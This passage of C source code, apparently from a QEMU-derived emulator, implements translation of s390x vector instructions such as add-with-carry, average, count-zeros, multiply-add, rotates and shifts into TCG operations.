tcg_temp_free_i64(tcg_ctx, t3); } static void gen_acc8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { gen_acc(tcg_ctx, d, a, b, ES_8); } static void gen_acc16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { gen_acc(tcg_ctx, d, a, b, ES_16); } static void gen_acc_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_add_i32(tcg_ctx, t, a, b); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, d, t, b); tcg_temp_free_i32(tcg_ctx, t); } static void gen_acc_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_add_i64(tcg_ctx, t, a, b); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_LTU, d, t, b); tcg_temp_free_i64(tcg_ctx, t); } static void gen_acc2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) { TCGv_i64 th = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_add2_i64(tcg_ctx, tl, th, al, zero, bl, zero); tcg_gen_add2_i64(tcg_ctx, tl, th, th, zero, ah, zero); tcg_gen_add2_i64(tcg_ctx, tl, dl, tl, th, bh, zero); tcg_gen_mov_i64(tcg_ctx, dh, zero); tcg_temp_free_i64(tcg_ctx, th); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, zero); } static DisasJumpType op_vacc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fni8 = gen_acc8_i64, }, { .fni8 = gen_acc16_i64, }, { .fni4 = gen_acc_i32, }, { .fni8 = gen_acc_i64, }, }; if (es > ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } else if (es == ES_128) { gen_gvec128_3_i64(tcg_ctx, gen_acc2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static void gen_ac2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh, TCGv_i64 cl, TCGv_i64 ch) { TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 th = tcg_const_i64(tcg_ctx, 0); /* extract the carry only */ tcg_gen_extract_i64(tcg_ctx, tl, cl, 0, 1); tcg_gen_add2_i64(tcg_ctx, dl, dh, al, ah, bl, bh); tcg_gen_add2_i64(tcg_ctx, dl, dh, dl, dh, tl, th); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, th); } static DisasJumpType op_vac(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (get_field(s, m5) != ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec128_4_i64(tcg_ctx, gen_ac2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4)); return DISAS_NEXT; } static void gen_accc2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh, TCGv_i64 cl, TCGv_i64 ch) { TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 th = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_andi_i64(tcg_ctx, tl, cl, 1); tcg_gen_add2_i64(tcg_ctx, tl, th, tl, zero, al, zero); tcg_gen_add2_i64(tcg_ctx, tl, th, tl, th, bl, zero); tcg_gen_add2_i64(tcg_ctx, tl, th, th, zero, ah, zero); tcg_gen_add2_i64(tcg_ctx, tl, dl, tl, th, bh, zero); tcg_gen_mov_i64(tcg_ctx, dh, zero); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, th); tcg_temp_free_i64(tcg_ctx, zero); } static DisasJumpType op_vaccc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (get_field(s, m5) != ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec128_4_i64(tcg_ctx, gen_accc2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4)); return DISAS_NEXT; } static DisasJumpType op_vn(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, and, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vnc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, andc, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static void gen_avg_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t0, a); tcg_gen_ext_i32_i64(tcg_ctx, t1, b); tcg_gen_add_i64(tcg_ctx, t0, t0, t1); tcg_gen_addi_i64(tcg_ctx, t0, t0, 1); tcg_gen_shri_i64(tcg_ctx, t0, t0, 1); tcg_gen_extrl_i64_i32(tcg_ctx, d, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_avg_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 al, TCGv_i64 bl) { TCGv_i64 dh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 ah = tcg_temp_new_i64(tcg_ctx); TCGv_i64 bh = tcg_temp_new_i64(tcg_ctx); /* extending the sign by one bit is sufficient */ tcg_gen_extract_i64(tcg_ctx, ah, al, 63, 1); tcg_gen_extract_i64(tcg_ctx, bh, bl, 63, 1); tcg_gen_add2_i64(tcg_ctx, dl, dh, al, ah, bl, bh); gen_addi2_i64(tcg_ctx, dl, dh, dl, dh, 1); tcg_gen_extract2_i64(tcg_ctx, dl, dl, dh, 1); tcg_temp_free_i64(tcg_ctx, dh); tcg_temp_free_i64(tcg_ctx, ah); tcg_temp_free_i64(tcg_ctx, bh); } static DisasJumpType op_vavg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fno = gen_helper_gvec_vavg8, }, { .fno = gen_helper_gvec_vavg16, }, { .fni4 = gen_avg_i32, }, { .fni8 = gen_avg_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static void gen_avgl_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t0, a); tcg_gen_extu_i32_i64(tcg_ctx, t1, b); tcg_gen_add_i64(tcg_ctx, t0, t0, t1); tcg_gen_addi_i64(tcg_ctx, t0, t0, 1); tcg_gen_shri_i64(tcg_ctx, t0, t0, 1); tcg_gen_extrl_i64_i32(tcg_ctx, d, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_avgl_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 al, TCGv_i64 bl) { TCGv_i64 dh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_add2_i64(tcg_ctx, dl, dh, al, zero, bl, zero); gen_addi2_i64(tcg_ctx, dl, dh, dl, dh, 1); tcg_gen_extract2_i64(tcg_ctx, dl, dl, dh, 1); tcg_temp_free_i64(tcg_ctx, dh); tcg_temp_free_i64(tcg_ctx, zero); } static DisasJumpType op_vavgl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fno = gen_helper_gvec_vavgl8, }, { .fno = gen_helper_gvec_vavgl16, }, { .fni4 = gen_avgl_i32, }, { .fni8 = gen_avgl_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static DisasJumpType op_vcksm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); TCGv_i32 sum = tcg_temp_new_i32(tcg_ctx); int i; read_vec_element_i32(tcg_ctx, sum, get_field(s, v3), 1, ES_32); for (i = 0; i < 4; i++) { read_vec_element_i32(tcg_ctx, tmp, get_field(s, v2), i, ES_32); tcg_gen_add2_i32(tcg_ctx, tmp, sum, sum, sum, tmp, tmp); } zero_vec(tcg_ctx, get_field(s, v1)); write_vec_element_i32(tcg_ctx, sum, get_field(s, v1), 1, ES_32); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, sum); return DISAS_NEXT; } static DisasJumpType op_vec(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint8_t es = get_field(s, m3); const uint8_t enr = NUM_VEC_ELEMENTS(es) / 2 - 1; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (s->fields.op2 == 0xdb) { es |= MO_SIGN; } o->in1 = tcg_temp_new_i64(tcg_ctx); o->in2 = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, o->in1, get_field(s, v1), enr, es); read_vec_element_i64(tcg_ctx, o->in2, get_field(s, v2), enr, es); return DISAS_NEXT; } static DisasJumpType op_vc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); TCGCond cond = s->insn->data; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tcg_gen_gvec_cmp(tcg_ctx, cond, es, vec_full_reg_offset(get_field(s, v1)), vec_full_reg_offset(get_field(s, v2)), vec_full_reg_offset(get_field(s, v3)), 16, 16); if (get_field(s, m5) & 0x1) { TCGv_i64 low = tcg_temp_new_i64(tcg_ctx); TCGv_i64 high = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, high, get_field(s, v1), 0, ES_64); read_vec_element_i64(tcg_ctx, low, get_field(s, v1), 1, ES_64); gen_op_update2_cc_i64(s, CC_OP_VC, low, high); tcg_temp_free_i64(tcg_ctx, low); tcg_temp_free_i64(tcg_ctx, high); } return DISAS_NEXT; } static void gen_clz_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a) { tcg_gen_clzi_i32(tcg_ctx, d, a, 32); } static void gen_clz_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a) { tcg_gen_clzi_i64(tcg_ctx, d, a, 64); } static DisasJumpType op_vclz(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); static const GVecGen2 g[4] = { { .fno = gen_helper_gvec_vclz8, }, { .fno = gen_helper_gvec_vclz16, }, { .fni4 = gen_clz_i32, }, { .fni8 = gen_clz_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_2(tcg_ctx, get_field(s, v1), get_field(s, v2), &g[es]); return DISAS_NEXT; } static void gen_ctz_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a) { tcg_gen_ctzi_i32(tcg_ctx, d, a, 32); } static void gen_ctz_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a) { tcg_gen_ctzi_i64(tcg_ctx, d, a, 64); } static DisasJumpType op_vctz(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); static const GVecGen2 g[4] = { { .fno = gen_helper_gvec_vctz8, }, { .fno = gen_helper_gvec_vctz16, }, { .fni4 = gen_ctz_i32, }, { .fni8 = gen_ctz_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_2(tcg_ctx, get_field(s, v1), get_field(s, v2), &g[es]); return DISAS_NEXT; } static DisasJumpType op_vx(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, xor, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vgfm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fno = gen_helper_gvec_vgfm8, }, { .fno = gen_helper_gvec_vgfm16, }, { .fno = gen_helper_gvec_vgfm32, }, { .fno = gen_helper_gvec_vgfm64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static DisasJumpType op_vgfma(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m5); static const GVecGen4 g[4] = { { .fno = gen_helper_gvec_vgfma8, }, { .fno = gen_helper_gvec_vgfma16, }, { .fno = gen_helper_gvec_vgfma32, }, { .fno = gen_helper_gvec_vgfma64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_4(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), &g[es]); return DISAS_NEXT; } static DisasJumpType op_vlc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_fn_2(tcg_ctx, neg, es, get_field(s, v1), get_field(s, v2)); return DISAS_NEXT; } static DisasJumpType op_vlp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_fn_2(tcg_ctx, abs, es, get_field(s, v1), get_field(s, v2)); return DISAS_NEXT; } static DisasJumpType op_vmx(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t v3 = get_field(s, v3); const uint8_t es = get_field(s, m4); if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0xff: gen_gvec_fn_3(tcg_ctx, smax, es, v1, v2, v3); break; case 0xfd: gen_gvec_fn_3(tcg_ctx, umax, es, v1, v2, v3); break; case 0xfe: gen_gvec_fn_3(tcg_ctx, smin, es, v1, v2, v3); break; case 0xfc: gen_gvec_fn_3(tcg_ctx, umin, es, v1, v2, v3); break; default: g_assert_not_reached(); } return DISAS_NEXT; } static void gen_mal_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b, TCGv_i32 c) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mul_i32(tcg_ctx, t0, a, b); tcg_gen_add_i32(tcg_ctx, d, t0, c); tcg_temp_free_i32(tcg_ctx, t0); } static void gen_mah_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b, TCGv_i32 c) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t0, a); tcg_gen_ext_i32_i64(tcg_ctx, t1, b); tcg_gen_ext_i32_i64(tcg_ctx, t2, c); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_add_i64(tcg_ctx, t0, t0, t2); tcg_gen_extrh_i64_i32(tcg_ctx, d, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void gen_malh_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b, TCGv_i32 c) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t0, a); tcg_gen_extu_i32_i64(tcg_ctx, t1, b); tcg_gen_extu_i32_i64(tcg_ctx, t2, c); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_add_i64(tcg_ctx, t0, t0, t2); tcg_gen_extrh_i64_i32(tcg_ctx, d, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static DisasJumpType op_vma(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m5); static const GVecGen4 g_vmal[3] = { { .fno = gen_helper_gvec_vmal8, }, { .fno = gen_helper_gvec_vmal16, }, { .fni4 = gen_mal_i32, }, }; static const GVecGen4 g_vmah[3] = { { .fno = gen_helper_gvec_vmah8, }, { .fno = gen_helper_gvec_vmah16, }, { .fni4 = gen_mah_i32, }, }; static const GVecGen4 g_vmalh[3] = { { .fno = gen_helper_gvec_vmalh8, }, { .fno = gen_helper_gvec_vmalh16, }, { .fni4 = gen_malh_i32, }, }; static const GVecGen4 g_vmae[3] = { { .fno = gen_helper_gvec_vmae8, }, { .fno = gen_helper_gvec_vmae16, }, { .fno = gen_helper_gvec_vmae32, }, }; static const GVecGen4 g_vmale[3] = { { .fno = gen_helper_gvec_vmale8, }, { .fno = gen_helper_gvec_vmale16, }, { .fno = gen_helper_gvec_vmale32, }, }; static const GVecGen4 g_vmao[3] = { { .fno = gen_helper_gvec_vmao8, }, { .fno = gen_helper_gvec_vmao16, }, { .fno = gen_helper_gvec_vmao32, }, }; static const GVecGen4 g_vmalo[3] = { { .fno = gen_helper_gvec_vmalo8, }, { .fno = gen_helper_gvec_vmalo16, }, { .fno = gen_helper_gvec_vmalo32, }, }; const GVecGen4 *fn; if (es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0xaa: fn = &g_vmal[es]; break; case 0xab: fn = &g_vmah[es]; break; case 0xa9: fn = &g_vmalh[es]; break; case 0xae: fn = &g_vmae[es]; break; case 0xac: fn = &g_vmale[es]; break; case 0xaf: fn = &g_vmao[es]; break; case 0xad: fn = &g_vmalo[es]; break; default: g_assert_not_reached(); } gen_gvec_4(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), fn); return DISAS_NEXT; } static void gen_mh_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_muls2_i32(tcg_ctx, t, d, a, b); tcg_temp_free_i32(tcg_ctx, t); } static void gen_mlh_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_mulu2_i32(tcg_ctx, t, d, a, b); tcg_temp_free_i32(tcg_ctx, t); } static DisasJumpType op_vm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g_vmh[3] = { { .fno = gen_helper_gvec_vmh8, }, { .fno = gen_helper_gvec_vmh16, }, { .fni4 = gen_mh_i32, }, }; static const GVecGen3 g_vmlh[3] = { { .fno = gen_helper_gvec_vmlh8, }, { .fno = gen_helper_gvec_vmlh16, }, { .fni4 = gen_mlh_i32, }, }; static const GVecGen3 g_vme[3] = { { .fno = gen_helper_gvec_vme8, }, { .fno = gen_helper_gvec_vme16, }, { .fno = gen_helper_gvec_vme32, }, }; static const GVecGen3 g_vmle[3] = { { .fno = gen_helper_gvec_vmle8, }, { .fno = gen_helper_gvec_vmle16, }, { .fno = gen_helper_gvec_vmle32, }, }; static const GVecGen3 g_vmo[3] = { { .fno = gen_helper_gvec_vmo8, }, { .fno = gen_helper_gvec_vmo16, }, { .fno = gen_helper_gvec_vmo32, }, }; static const GVecGen3 g_vmlo[3] = { { .fno = gen_helper_gvec_vmlo8, }, { .fno = gen_helper_gvec_vmlo16, }, { .fno = gen_helper_gvec_vmlo32, }, }; const GVecGen3 *fn; if (es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0xa2: gen_gvec_fn_3(tcg_ctx, mul, es, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; case 0xa3: fn = &g_vmh[es]; break; case 0xa1: fn = &g_vmlh[es]; break; case 0xa6: fn = &g_vme[es]; break; case 0xa4: fn = &g_vmle[es]; break; case 0xa7: fn = &g_vmo[es]; break; case 0xa5: fn = &g_vmlo[es]; break; default: g_assert_not_reached(); } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), fn); return DISAS_NEXT; } static DisasJumpType op_vnn(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, nand, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vno(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, nor, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vnx(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, eqv, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vo(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, or, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_voc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, orc, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vpopct(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); static const GVecGen2 g[4] = { { .fno = gen_helper_gvec_vpopct8, }, { .fno = gen_helper_gvec_vpopct16, }, { .fni4 = tcg_gen_ctpop_i32, }, { .fni8 = tcg_gen_ctpop_i64, }, }; if (es > ES_64 || (es != ES_8 && !s390_has_feat(s->uc, S390_FEAT_VECTOR_ENH))) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_2(tcg_ctx, get_field(s, v1), get_field(s, v2), &g[es]); return DISAS_NEXT; } static void gen_rll_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, b, 31); tcg_gen_rotl_i32(tcg_ctx, d, a, t0); tcg_temp_free_i32(tcg_ctx, t0); } static void gen_rll_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t0, b, 63); tcg_gen_rotl_i64(tcg_ctx, d, a, t0); tcg_temp_free_i64(tcg_ctx, t0); } static DisasJumpType op_verllv(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fno = gen_helper_gvec_verllv8, }, { .fno = gen_helper_gvec_verllv16, }, { .fni4 = gen_rll_i32, }, { .fni8 = gen_rll_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static DisasJumpType op_verll(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen2s g[4] = { { .fno = gen_helper_gvec_verll8, }, { .fno = gen_helper_gvec_verll16, }, { .fni4 = gen_rll_i32, }, { .fni8 = gen_rll_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_2s(tcg_ctx, get_field(s, v1), get_field(s, v3), o->addr1, &g[es]); return DISAS_NEXT; } static void gen_rim_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b, int32_t c) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_rotli_i32(tcg_ctx, t, a, c & 31); tcg_gen_and_i32(tcg_ctx, t, t, b); tcg_gen_andc_i32(tcg_ctx, d, d, b); tcg_gen_or_i32(tcg_ctx, d, d, t); tcg_temp_free_i32(tcg_ctx, t); } static void gen_rim_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b, int64_t c) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_rotli_i64(tcg_ctx, t, a, c & 63); tcg_gen_and_i64(tcg_ctx, t, t, b); tcg_gen_andc_i64(tcg_ctx, d, d, b); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static DisasJumpType op_verim(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m5); const uint8_t i4 = get_field(s, i4) & (NUM_VEC_ELEMENT_BITS(es) - 1); static const GVecGen3i g[4] = { { .fno = gen_helper_gvec_verim8, }, { .fno = gen_helper_gvec_verim16, }, { .fni4 = gen_rim_i32, .load_dest = true, }, { .fni8 = gen_rim_i64, .load_dest = true, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_3i(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), i4, &g[es]); return DISAS_NEXT; } static DisasJumpType op_vesv(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t v3 = get_field(s, v3); if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0x70: gen_gvec_fn_3(tcg_ctx, shlv, es, v1, v2, v3); break; case 0x7a: gen_gvec_fn_3(tcg_ctx, sarv, es, v1, v2, v3); break; case 0x78: gen_gvec_fn_3(tcg_ctx, shrv, es, v1, v2, v3); break; default: g_assert_not_reached(); } return DISAS_NEXT; } static DisasJumpType op_ves(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t d2 = get_field(s, d2) & (NUM_VEC_ELEMENT_BITS(es) - 1); const uint8_t v1 = get_field(s, v1); const uint8_t v3 = get_field(s, v3); TCGv_i32 shift; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (likely(!get_field(s, b2))) { switch (s->fields.op2) { case 0x30: gen_gvec_fn_2i(tcg_ctx, shli, es, v1, v3, d2); break; case 0x3a: gen_gvec_fn_2i(tcg_ctx, sari, es, v1, v3, d2); break; case 0x38: gen_gvec_fn_2i(tcg_ctx, shri, es, v1, v3, d2); break; default: g_assert_not_reached(); } } else { shift = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, shift, o->addr1); tcg_gen_andi_i32(tcg_ctx, shift, shift, NUM_VEC_ELEMENT_BITS(es) - 1); switch (s->fields.op2) { case 0x30: gen_gvec_fn_2s(tcg_ctx, shls, es, v1, v3, shift); break; case 0x3a: gen_gvec_fn_2s(tcg_ctx, sars, es, v1, v3, shift); break; case 0x38: gen_gvec_fn_2s(tcg_ctx, shrs, es, v1, v3, shift); break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, shift); } 